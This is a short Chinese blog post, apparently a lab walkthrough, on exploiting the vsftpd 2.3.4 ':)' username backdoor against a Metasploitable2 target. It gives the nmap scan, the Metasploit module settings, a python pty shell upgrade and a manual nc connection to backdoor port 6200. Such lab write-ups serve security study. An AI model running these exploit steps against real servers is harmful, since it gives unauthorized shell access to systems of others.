vsftpd2.3.4 后门笑脸漏洞

在vsftpd 2.3.4版本中，在登录输入用户名时输入:)类似于笑脸的符号，会导致服务处理开启6200后门端口，直接执行系统命令

攻击机:kali 2022 msfconsole利用或者nc连接后门端口利用
靶机: Metasploitable2-Linux，这是一个集成了很多漏洞的平台

首先使用nmap进行目标版本服务进行扫描
靶机IP为:172.16.1.104

nmap -sV -p- -n 172.16.1.104

开启msfconsole利用平台进行漏洞利用

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 172.16.1.104
run

漏洞利用成功，再利用成功后我们终端显示的非常难受，可以执行python命令获取一个虚拟终端

python -c "import pty;pty.spawn('/bin/sh')"

使用ftp 172.16.1.104连接靶机，用户名输入任意用户名加:)，例如root:)
密码随便输入

打开一个终端使用nc进行连接

nc 172.16.1.104 6200

漏洞利用成功

posted @ 2022-03-30 11:30 Junglezt 阅读(903) 评论(0) 编辑收藏举报

刷新页面返回顶部

Junglezt的博客